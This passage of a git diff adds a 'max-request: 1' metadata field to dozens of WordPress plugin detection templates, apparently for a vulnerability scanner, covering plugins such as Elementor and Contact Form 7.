b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 